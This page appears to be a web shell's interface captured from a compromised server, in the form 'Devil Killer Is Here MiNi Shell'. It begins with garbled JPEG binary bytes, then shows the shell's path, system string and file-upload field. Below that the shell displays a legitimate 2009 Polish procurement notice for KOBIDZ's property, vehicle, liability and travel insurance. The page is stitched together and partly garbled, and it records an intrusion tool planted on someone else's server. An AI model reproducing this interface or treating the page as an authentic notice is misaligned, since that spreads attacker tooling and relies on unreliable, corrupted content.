JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090107/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090107/6979-N-2009.html

<p class="kh_header"><b>Warszawa: Usługi ubezpieczenia mienia, pojazdów mechanicznych i obsługi prawnej
Krajowego Ośrodka Badań i Dokumentacji Zabytków</b><br>
<b>Numer ogłoszenia: 6979 - 2009; data zamieszczenia: 07.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Krajowy Ośrodek Badań i Dokumentacji Zabytków , ul. Szwoleżerów 9, 00-464 Warszawa, woj. mazowieckie, tel. 022 6293791, faks 022 6226595.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kobidz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytucja Kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi ubezpieczenia mienia, pojazdów mechanicznych i obsługi prawnej
Krajowego Ośrodka Badań i Dokumentacji Zabytków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa ubezpieczenia mienia i pojazdów mechanicznych Krajowego Ośrodka Badań i Dokumentacji Zabytków. Przedmiotu zamówienia obejmuje:

1.	Ubezpieczenie budynków i budowli od ognia i innych zdarzeń losowych w pełnym zakresie w tym w szczególności za szkody polegające na: utracie, zniszczeniu lub uszkodzeniu mienia na skutek nagłego, niespodziewanego i niezależnego od woli Zamawiającego zdarzenia, m.in: pożar, bezpośrednie i pośrednie uderzenie pioruna, wybuch, upadek statku powietrznego, huragan, deszcz nawalny, powódź, lawina, ciężar śniegu, działanie mrozu, grad, trzęsienie ziemi, zapadanie lub osuwanie się ziemi, zalanie przez wydostawanie się wody i innych cieczy lub pary z urządzeń wodno - kanalizacyjnych lub technologicznych, dym, uderzenie pojazdu, huk ponaddźwiękowy, dewastacja (rozumiane jako umyślne uszkodzenie lub zniszczenie ubezpieczonego mienia przez osoby trzecie) z włączeniem przepięć, aktów terroru, upadku drzew i masztów a także refundacji kosztów uprzątnięcia pozostałości po szkodzie, łącznie z kosztami rozbiórki i demontażu części niezdatnych do użytku, do wysokości sumy ubezpieczenia i refundacji kosztów zabezpieczenia mienia przed uszkodzeniem w przypadku bezpośredniego zagrożenia zdarzeniem oraz koszty związane z ratunkiem dotkniętego szkodą mienia, mające na celu niedopuszczenie do zwiększenia strat.  Koszty te pokrywane są bez względu na wynik działań zabezpieczających i ratowniczych do wysokości  sumy ubezpieczenia o wartości  = 12.718.000,00 PLN
2.	Ubezpieczenie nakładów inwestycyjnych od ognia i innych zdarzeń losowych w pełnym zakresie w tym w szczególności za szkody polegające na: utracie, zniszczeniu lub uszkodzeniu mienia na skutek nagłego, niespodziewanego i niezależnego od woli Zamawiającego zdarzenia, m.in: pożar, bezpośrednie i pośrednie uderzenie pioruna, wybuch, upadek statku powietrznego, huragan, deszcz nawalny, powódź, lawina, ciężar śniegu, działanie mrozu, grad, trzęsienie ziemi, zapadanie lub osuwanie się ziemi, zalanie przez wydostawanie się wody i innych cieczy lub pary z urządzeń wodno - kanalizacyjnych lub technologicznych, dym, uderzenie pojazdu, huk ponaddźwiękowy, dewastacja (rozumiane jako umyślne uszkodzenie lub zniszczenie ubezpieczonego mienia przez osoby trzecie) z włączeniem przepięć, aktów terroru, upadku drzew i masztów a także refundacji kosztów uprzątnięcia pozostałości po szkodzie, łącznie z kosztami rozbiórki i demontażu części niezdatnych do użytku, do wysokości sumy ubezpieczenia i refundacji kosztów zabezpieczenia mienia przed uszkodzeniem w przypadku bezpośredniego zagrożenia zdarzeniem oraz koszty związane z ratunkiem dotkniętego szkodą mienia, mające na celu niedopuszczenie do zwiększenia strat.  Koszty te pokrywane są bez względu na wynik działań zabezpieczających i ratowniczych do wysokości  sumy ubezpieczenia o wartości  = 1.265.435,00 PLN
3.	Ubezpieczenie mienia ruchomego (m.in. maszyny, urządzenia, wyposażenie) od ognia i innych zdarzeń losowych w pełnym zakresie w tym w szczególności za szkody polegające na: utracie, zniszczeniu lub uszkodzeniu mienia na skutek nagłego, niespodziewanego i niezależnego od woli Zamawiającego zdarzenia, m.in: pożar, bezpośrednie i pośrednie uderzenie pioruna, wybuch, upadek statku powietrznego, huragan, deszcz nawalny, powódź, lawina, ciężar śniegu, działanie mrozu, grad, trzęsienie ziemi, zapadanie lub osuwanie się ziemi, zalanie przez wydostawanie się wody i innych cieczy lub pary z urządzeń wodno - kanalizacyjnych lub technologicznych, dym, uderzenie pojazdu, huk ponaddźwiękowy,  dewastacja (rozumiane jako umyślne uszkodzenie lub zniszczenie ubezpieczonego mienia przez osoby trzecie) z włączeniem przepięć, aktów terroru, upadku drzew i masztów a także refundacji kosztów uprzątnięcia pozostałości po szkodzie, łącznie z kosztami rozbiórki i demontażu części niezdatnych do użytku, do wysokości sumy ubezpieczenia i refundacji kosztów zabezpieczenia mienia przed uszkodzeniem w przypadku bezpośredniego zagrożenia zdarzeniem oraz koszty związane z ratunkiem dotkniętego szkodą mienia, mające na celu niedopuszczenie do zwiększenia strat.  Koszty te pokrywane są bez względu na wynik działań zabezpieczających i ratowniczych do wysokości  sumy ubezpieczenia o wartości  = 2.244.911,00 PLN

Szkodowość z ubezpieczenia mienia od ognia i innych zdarzeń losowych w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania:

2006r. - 527,45  PLN zalanie siedziby; 
2006r. -  4.644,20 PLN - podczas burzy upadające drzewo uszkodziło ogrodzenie parku;
2006r.- 954,33 PLN zalanie spowodowane awarią grzejników.
2008r.- 2.021,94 PLN zalanie siedziby
2008r.- 1.178,32 PLN  uszkodzenie ogrodzenia parku(szkoda komunikacyjna)
2008r. -778,24 PLN  zalanie siedziby
Wysokość roszczenia odpowiadała wysokości poniesionej szkody.

4.	Ubezpieczenie mienia ruchomego ( maszyny urządzenia wyposażenie )  od kradzieży z włamaniem i rabunku z dewastacją o wartości = 2.244.911,00 PLN oraz koszty akcji ratowniczej i koszty uprzątnięcia pozostałości po szkodzie do wysokości sumy ubezpieczenia;

Szkodowość z ubezpieczenia mienia ruchomego od kradzieży z włamaniem i rabunku w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania- nie występowała
 
5.	Ubezpieczenie elementów stałych (elementy zamontowane lub wbudowane na stałe, w sposób uniemożliwiający ich odłączenie bez użycia narzędzi np: meble wbudowane na stałe, zabudowy wnęk, pawlaczy i ścian, stolarka okienna i drzwiowa, zabezpieczenia przeciw włamaniowe drzwi i okien, wykładziny ścian , podłóg, schodów i sufitów, powłoki malarskie, gładzie szpachle, podłogi i podwieszane sufity, instalacje i urządzenia sanitarne, obudowy instalacji i grzejników) od skutków kradzieży z włamaniem i rabunku o wartości =20 000 PLN na każdą siedzibę KOBIDZ oraz koszty akcji ratowniczej i koszty uprzątnięcia pozostałości po szkodzie do wysokości sumy ubezpieczenia

Szkodowość z ubezpieczenia w w/w zakresie w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania- nie występowała.

6.	Ubezpieczenie szyb i przedmiotów szklanych od stłuczenia o wartości = 34.000,00 PLN oraz koszty uprzątnięcia pozostałości po szkodzie do wysokości sumy ubezpieczenia.

Szkodowość z ubezpieczenia szyb i przedmiotów szklanych w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania- nie występowała.

7.	Ubezpieczenie elektroniki stacjonarnej i mobilnej wg wartości odtworzeniowej (wartością odtworzeniową jest cena zakupu sprzętu o tych samych albo najbardziej zbliżonych parametrach technicznych, łącznie z kosztami pochodnymi związanymi z tym zakupem tj. kosztami demontażu, ponownego montażu, transportu itp. ) od wszystkich ryzyk.
a.	sprzęt stacjonarny o wartości = 2.361.054,00 PLN    
b.	sprzęt mobilny (aparaty fotograficzne i akcesoria, laptopy, dalmierze, skaner laserowy, niwelatory, kamery, rzutniki-projektory, tel. komórkowe  w ilości  41 sztuk, wilgotnościomierze)  o wartości = 1.402.500,00 PLN

oraz koszty akcji ratowniczej i koszty uprzątnięcia pozostałości po szkodzie do wysokości sumy ubezpieczenia.

Szkodowość z ubezpieczenia sprzętu elektronicznego w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania: nie wystąpiła.

Przedmiot zamówienia obejmuje również:

1.	Ubezpieczenie od odpowiedzialności cywilnej z tytułu prowadzenia statutowej działalności i posiadanego mienia oraz mienia będącego w pieczy na podstawie umów cywilnoprawnych (odpowiedzialność deliktowa) oraz odpowiedzialność kontraktowa związana z wykonywaniem umów w ramach działalności statutowej KOBIDZ (Statut KOBIDZ znajduje się pod adresem: http://www.kobidz.pl/app/site.php5/Show/2.html). Ubezpieczenie od odpowiedzialności cywilnej (deliktowej i kontraktowej) obejmuje koszty wynagrodzenia rzeczoznawców powołanych przez zakład ubezpieczeń lub za jego zgodą, w celu ustalenia okoliczności i rozmiaru szkody. -suma gwarancyjna na jedno i wszystkie zdarzenia 1.000.000,00 PLN odpowiedzialność cywilna deliktowa; -suma gwarancyjna na jedno i wszystkie zdarzenia 1.000.000,00 PLN odpowiedzialność cywilna kontraktowa.


Rodzaj kontraktów: Umowy zlecenia zawarte z Wykonawcami w związku z realizacją celów statutowych. Treść w/w umów negocjowana indywidualnie z Wykonawcami.

Szkodowość z ubezpieczenia od OC w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania: wystąpiła.
2008r.  wypłacono 1000 PLN 

2.	Ubezpieczenie gotówki od kradzieży z włamaniem i rabunku w lokalach we wszystkich siedzibach KOBIDZ suma ubezpieczenia 10.000,00 PLN na każdą siedzibę oraz koszty akcji ratowniczej i koszty uprzątnięcia pozostałości po szkodzie do wysokości sumy ubezpieczenia.


Szkodowość z ubezpieczenia w w/w zakresie w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania- nie występowała.


3.	Ubezpieczenie gotówki od ognia i innych zdarzeń losowych w pełnym zakresie w lokalach we wszystkich siedzibach KOBIDZ- suma ubezpieczenia 10.000,00 PLN na każdą siedzibę oraz koszty akcji ratowniczej i koszty uprzątnięcia pozostałości po szkodzie do wysokości sumy ubezpieczenia.

Szkodowość z ubezpieczenia w w/w zakresie w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania- nie występowała.


4.	Ubezpieczenie gotówki od rabunku w transporcie  w obrębie jednej miejscowości  we wszystkich siedzibach KOBIDZ- suma ubezpieczenia 10.000,00 PLN na każdą siedzibę.

Transport gotówki jest dokonywany 2x w tygodniu.


Szkodowość z ubezpieczenia w w/w zakresie w okresie ostatnich 3 lat poprzedzających datę ogłoszenia postępowania- nie występowała.

   
5.	Ubezpieczenie floty pojazdów w zakresie OC, AC+KR, NNW kom. Assistance oraz szyby (od wszelkich ryzyk- wszystkie zdarzenia powodujące uszkodzenie szyb w pojazdach) sumy ubezpieczenia w zakresie określonym w tabeli stanowiącej załącznik nr 2 do Opisu Przedmiotu Zamówienia.

Szkodowość z ubezpieczenia OC, AC, NNW w okresie ostatnich 2 lat poprzedzających datę ogłoszenia postępowania: nie wystąpiła, 

Każdy pojazd mechaniczny jest wyposażony wyłącznie w 2 oryginalne klucze.

6.	Ubezpieczenie ochrony prawnej związanej z posiadaniem i użytkowaniem pojazdu w postępowaniu sądowym i pozasądowym (koszty pomocy prawnej związanej z działaniami na rzecz ochrony prawnych interesów Zamawiającego związanych ze zdarzeniem z udziałem pojazdów lub dotyczących pojazdów wyszczególnionych w załączniku nr 2 do Opisu przedmiotu zamówienia, które spowodowało wystąpienie szkody: zarówno koszty dochodzenia jak i postępowania przesądowego i sądowego) w zakresie:
a)	Zakres minimalnej ochrony prawnej Właściciela Pojazdu i Kierowcy: dochodzenie roszczeń odszkodowawczych z tytułu czynów niedozwolonych za szkody na osobie lub mieniu, jak również obrona przed roszczeniami odszkodowawczymi osób trzecich przeciwko Zamawiającemu w tym roszczenia wynikające z działań wojennych, zamieszek, rozruchów, katastrof i blokad dróg,  roszczeń wzajemnych pomiędzy współpasażerami oraz pomiędzy Współpasażerami a Ubezpieczonym;
b)	Minimalny zakres terytorialny: Europa;
c)	Suma ubezpieczenia 50 000 Euro
7.	Ubezpieczenie w podróży zagranicznej pracowników (ubezpieczenie grupowe polisa otwarta)
Zakres ubezpieczenia:
Ubezpieczenie kosztów leczenia i pomoczy assistance, ubezpieczenie Następstw Nieszczęśliwych Wypadków, Ubezpieczenie Odpowiedzialności Cywilnej za szkody na osobie i na rzeczy, ubezpieczenie bagażu podróżnego, Ubezpieczenie kosztów odwołania uczestnictwa, noclegów i biletu lotniczego, pogorszeniem stanu zdrowia w przypadku choroby przewlekłej, pasywnym udziałem we wszystkich wydarzeniach, które miały miejsce na terenach objętych działaniami wojennymi oraz aktami terroru.
1)	Ubezpieczenie kosztów leczenia i pomocy assistance (Suma ubezpieczenia: 100.000,00 Euro):
Koszty leczenia poniesione w podróży zagranicznej przez pracowników Zamawiającego, którzy musieli niezwłocznie poddać się leczeniu w związku z nagłym zachorowaniem lub nieszczęśliwym wypadkiem, w zakresie niezbędnym do przywrócenia stanu zdrowia umożliwiającego jego powrót lub transport do miejsca zamieszkania lub placówki medycznej na terenie RP. 
a)	Za koszty leczenia uważa się: badania i zabiegi, konsultacje, dojazd lekarza, zakup lekarstw, płynów infuzyjnych, środków opatrunkowych i ortopedycznych przepisanych przez lekarza, naprawę protez bezpośrednio po wypadku, transport chorego do szpitala, pobyt w szpitalu i leczenie, honoraria lekarskie, transport do innego szpitala jeżeli dany szpital nie zapewnia opieki medycznej dostosowanej do jego stanu zdrowia.  
b)	 Za koszty usług związanych z pomocą assistance uważa się: kontakt z osobą bliską, transport na teren RP, transport zwłok, pomoc w przypadku kradzieży lub utraty dokumentów, pomoc w odzyskaniu i ponownym wysłaniu bagażu, przedłużenie ochrony ubezpieczeniowej w sytuacjach nagłych, transport osób towarzyszących pracownikowi ubezpieczonego w razie jego śmierci oraz koszty jego pobytu za granicą, transport i pobyt osoby wezwanej do chorego, kierowcę zastępczego, wyżywienie i zakwaterowanie za granicą w celu rekonwalescencji, pomoc prawną, wpłatę w poczet kaucji, dosłanie niezbędnych przedmiotów osobistych, pomoc finansową, pomoc tłumacza.
2)	Ubezpieczenie NNW (Suma ubezpieczenia: 100.000,00 PLN):
Zakres ubezpieczenia:
Przedmiotem ubezpieczenia następstw nieszczęśliwych. wypadków jest zdrowie i życie pracowników Zamawiającego. Ochroną ubezpieczeniową objęte są następstwa nieszczęśliwych wypadków, które wydarzyły się podczas trwania podróży służbowych m.in. świadczenie na wypadek trwałego inwalidztwa wypłacane jako procent sumy ubezpieczenia wskazanej w dokumencie ubezpieczenia w oparciu o tabelę stopnia trwałego inwalidztwa  lub świadczenie na wypadek trwałego uszczerbku na zdrowiu wypłacane jako procent sumy ubezpieczenia wskazanej w dokumencie ubezpieczenia w oparciu o tabelę oceny procentowej trwałego uszczerbku na zdrowiu. Świadczenie na wypadek śmierci w wyniku nieszczęśliwego wypadku powstałej w okresie do 12 miesięcy od daty nieszczęśliwego wypadku. Świadczenie wypłacane jest w wysokości 100% sumy ubezpieczenia na wypadek trwałego inwalidztwa lub na wypadek trwałego uszczerbku na zdrowiu, wskazanej w dokumencie ubezpieczenia. Ponadto ubezpieczeniem obejmuje wszelkie choroby somatyczne (np. zawał serca, udar mózgu, wlew krwi do mózgu), epidemie oraz skażenia; wydarzenia bezpośrednio związane z rozruchami i niepokojami społecznymi, zamieszkami, strajkami, sabotażem oraz zamachami; wydarzeniami bezpośrednio związanymi z działaniami wojennymi o zasięgu lokalnym i międzynarodowym oraz aktami terroru.
3)	Ubezpieczenie odpowiedzialności cywilnej w życiu prywatnym za szkody na osobie i na rzeczy (suma ubezpieczenia: 100.000,00 euro)
Zakres ubezpieczenia:
Przedmiotem ubezpieczenia jest odpowiedzialność cywilna Zamawiającego za szkody na osobie i na rzeczy wyrządzone czynem niedozwolonym (odpowiedzialność deliktowa) osobom trzecim poza granicami Rzeczypospolitej Polskiej i kraju siedziby Zamawiającego, w związku z wykonywaniem czynności życia prywatnego (służbowych) przez pracowników Zamawiającego. Ubezpieczenie obejmuje szkody  wyrządzone przez pracowników Zamawiającego jeżeli zgodnie z przepisami prawa kraju, w którym Ubezpieczony przebywa, jest on zobowiązany do ich naprawienia. Ponadto ubezpieczenie obejmuje szkody powstałe wskutek utraty lub uszkodzenia mienia należącego do Zamawiającego, lub mienia innej osoby, z którego korzystał Zamawiający na podstawie umowy najmu, dzierżawy, użytkowania, przechowywania lub innej podobnej formy. Ubezpieczenie obejmuje działania wojenne o zasięgu lokalnym i międzynarodowym.
4)	Ubezpieczenie bagażu podróżnego (suma ubezpieczenia 10.000,00 euro)
Zakres ubezpieczenia:
Ubezpieczenie obejmuje bagaż podróżny pracowników Zamawiającego tj.: walizy, plecaki, torby, nesesery, paczki i temu podobne pojemniki wraz z ich zawartością w postaci odzieży i rzeczy osobistych należących do pracowników Zamawiającego towarzyszących mu podczas jego podróży zagranicznej. Ochroną ubezpieczeniową objęty jest bagaż podróżny, jeżeli znajduje się pod bezpośrednią opieką Zamawiającego lub jeżeli: 1) Zamawiający: powierzył bagaż zawodowemu przewoźnikowi do przewozu na podstawie odpowiedniego dokumentu przewozowego; 2) Zamawiający oddał bagaż za pokwitowaniem do przechowalni bagażu; 3) Zamawiający zostawił bagaż w zamkniętym na zamek mechaniczny lub elektroniczny pomieszczeniu zajmowanym przez Zamawiającego w miejscu zakwaterowania; 4) Zamawiający zostawił bagaż w zamkniętym indywidualnym pomieszczeniu bagażowym na dworcu (kolejowym, autobusowym, lotniczym);  5) Zamawiający umieścił bagaż w zamkniętym luku bagażowym lub zamkniętym (na zamek mechaniczny bądź elektroniczny) bagażniku samochodu, stojącego na parkingu strzeżonym, a zaginięcie bagażu jest potwierdzone wystawieniem odpowiedniego dokumentu; 6) Zamawiający umieścił bagaż w zamkniętej na zamek mechaniczny lub elektroniczny jednostce pływającej lub kabinie przyczepy samochodowej (kempingowej) znajdujących się na terenie strzeżonym.  W przypadku sprzętu tj. telefony przenośne, sprzęt fotograficzny i kamery video, przenośny sprzęt komputerowy, sprzęt służący do odtwarzania i nagrywania dźwięku, gry wideo ubezpieczenie obejmuje ryzyko jego utraty w przypadku zrabowania sprzętu, który był w posiadaniu (noszony przy sobie w trakcie podróży) pracownika Zamawiającego. 
Ubezpieczenie obejmuje: 1) odszkodowanie za utratę, zniszczenie lub uszkodzenie bagażu podróżnego w przypadku: wystąpienia zdarzenia losowego typu: pożar, huragan, powódź, deszcz nawalny, grad, lawina, bezpośrednie i pośrednie uderzenie piorunu, trzęsienie, zapadanie lub osuwanie się ziemi, wybuch lub upadek pojazdu powietrznego oraz wydostanie się wody z urządzeń wodno-kanalizacyjnych; 2) udokumentowanej kradzieży z włamaniem lub rabunku; 3) nieszczęśliwego. wypadku lub nagłego zachorowania zgłoszonego do Wykonawcy i potwierdzonego diagnozą lekarską, w wyniku którego pracownik Zamawiającego pozbawiony był możliwości zaopiekowania się i zabezpieczenia bagażu; 4) zaginięciem w przypadku, gdy bagaż znajdował się pod opieką zawodowego przewoźnika, na podstawie dokumentu przewozowego lub został oddany do przechowalni za pokwitowaniem; 5) uszkodzenia lub zniszczenia waliz, plecaków, toreb, neseserów, paczek i temu podobnych pojemników wyłącznie na skutek udokumentowanej kradzieży części lub całej ich zawartości; 6) pokrycia kosztów, które poniósł pracownik Zamawiającego na zakup  przedmiotów pierwszej potrzeby (odzież, przybory toaletowe, artykuł spożywcze) na podstawie oryginałów rachunków, do wysokości co najmniej 400 Euro w przypadku gdy opóźnienie w dostarczeniu bagażu podróżnego przez linie lotnicze do miejsca pobytu pracownika Zamawiającego poza granicami Rzeczypospolitej Polskiej i kraju siedziby Zamawiającego wynosi co najmniej 8 godzin.
5)	Ubezpieczenie kosztów odwołania uczestnictwa w zagranicznej imprezie turystycznej lub też wcześniejszego z niej powrotu (Suma ubezpieczenia: do wysokości poniesionych  kosztów)
Zakres ubezpieczenia:
Ubezpieczenie obejmuje koszty odwołania uczestnictwa w zagranicznej podróży tj. 1) koszty, jakimi Zamawiający byłby obciążony przez organizatora w razie odwołania przez Zamawiającego  przed planowaną datą wyjazdu  uczestnictwa we wcześniej zarezerwowanym wyjeździe; 2) kosztów wcześniejszego powrotu z zagranicznej podróży na teren Rzeczypospolitej Polskiej  pracowników Zamawiającego, spowodowanym zdarzeniami losowymi niezależnymi od Zamawiającego m.in. nagła ciężka choroba lub nieszczęśliwy wypadek członka rodziny pracownika Zamawiającego, wymagająca natychmiastowej hospitalizacji i nie rokująca powrotem do zdrowia do czasu planowanego wyjazdu służbowego;  zgon pracownika Zamawiającego lub członka jego rodziny;  poważnego zdarzenia losowego w miejscu zamieszkania pracownika Zamawiającego lub w siedzibie Zamawiającego; udokumentowanej kradzieży dokumentów niezbędnych w podróży zagranicznej;  bezwarunkowego wezwania przez władze administracyjne Rzeczypospolitej Polskiej doręczonego Zamawiającemu w czasie podróży zagranicznej.
6)	Ubezpieczenie kosztów odwołania noclegów i biletu lotniczego do wysokości poniesionych kosztów (Suma ubezpieczenia: do wysokości poniesionych  kosztów)
Ubezpieczenie obejmuje koszty, którymi Zamawiający został obciążony przez organizatora podróży w razie odwołania wcześniej zarezerwowanych przez Zamawiającego noclegów przed rozpoczęciem pobytu z następujących powodów: nieszczęśliwego. wypadku skutkującego natychmiastową hospitalizacją pracownika Zamawiającego lub powodującego znaczne ograniczenia samodzielności ruchowej pracownika Zamawiającego; nagłej ciężkiej choroby pracownika Zamawiającego, wymagającej natychmiastowej hospitalizacji i nie rokującej wyzdrowienia do czasu planowanego wyjazdu;  nagłej ciężkiej choroby lub nieszczęśliwego wypadku członka rodziny pracownika Zamawiającego, zgonu pracownika Zamawiającego lub członka jego rodziny.
 Okres ubezpieczenia przedmiotu zamówienia: 24 miesiące od dnia podpisania umowy. 
Jako szkodowość Zamawiający rozumie szkody wypłacone, zgłoszone roszczenia i odmówione, zgłoszone roszczenia, które aktualnie figurują jako rezerwy szkodowe.

Zamawiający prowadzi wyłącznie statutową działalność wg PKD- 9252B.

Mienie i pojazdy mechaniczne obejmujące zakres ubezpieczenia są własnością Zamawiającego z wyjątkiem budynku w Grodzisku Maz. -własność Skarbu   Państwa ( sprawowany trwały zarząd przez Zamawiającego).

Zamawiający osiągnął przychodu z tytułu odszkodowania w roku 2008r. w zakresie objętym niniejszym przedmiotem zamówienia w wysokości 3.978,50 PLN

Przychody  netto Zamawiającego ze sprzedaży wyrobów i usług  w 2008r. - 440.000,00 PLN.

Ubezpieczenie od ognia na sumy stałe obliczono wg wartości odtworzeniowej, natomiast od kradzieży na pierwsze ryzyko wg wartości odtworzeniowej

Zakres terytorialny ubezpieczeń: ubezpieczenia mienia - terytorium Rzeczpospolitej Polski lub wg w/w opisów; ubezpieczenia pojazdów mechanicznych - terytorium Europy;


Załacznik nr 2 do Opisu przedmiotu zamówienia wg następujacych kategorii:

Lp,Marka,Rodzaj,Nr rej.,Poj/ład,l.osób,Su AC,Nr nadwozia / ramy,Nr silnika,	Przebieg Ubezpieczenie OC do,	Ubezpieczenie AC do,	Data badania technicznego,	Rok produkcji,	Autoalarm,	Immobiliser,	Ośrodek:
1) Toyota Land Cruiser,	osobowy,	WI 1050 E,	2982,	5,	146.700,00,	JTEBZ29J000101850,	1KD1418230,	66 000,31.01.2009r.,	31.01.2009r.,	26.04.2009r.,	2006r.,	fabryczny,	 MULTI LOCK immobilaiser,	Warszawa;
